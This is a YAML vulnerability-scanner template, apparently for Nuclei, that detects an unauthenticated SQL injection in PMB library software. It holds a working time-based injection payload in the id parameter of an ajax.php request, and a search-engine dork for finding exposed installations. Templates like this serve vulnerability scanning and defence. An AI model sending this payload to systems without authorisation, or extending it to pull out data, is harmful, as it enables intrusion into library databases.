33 lines
1.2 KiB
YAML
33 lines
1.2 KiB
YAML
id: pmb-sqli
|
|
|
|
info:
|
|
name: PMB <= 7.4.6 - SQL Injection
|
|
author: r3Y3r53
|
|
severity: high
|
|
description: |
|
|
PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/51197
|
|
- https://vulners.com/exploitdb/EDB-ID:51197
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
google-query: inurl:"opac_css"
|
|
tags: sqli,unauth,pmb
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 15s
|
|
GET /pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(7)))SHde)&module=ajax&sub=save&token=undefined HTTP/2
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains(header, "PmbOpac")'
|
|
- 'duration>=7'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 4a0a00473045022100ca5fb6cd89764349de6ea9c869dcb635a1fc2cbaff7557e388a9256447703d0302204076bc34d0f6c6d95b7519f0ed04446a082922dec29a5bdfd9282a5ea398c15f:922c64590222798bb761d5b6d8e72950 |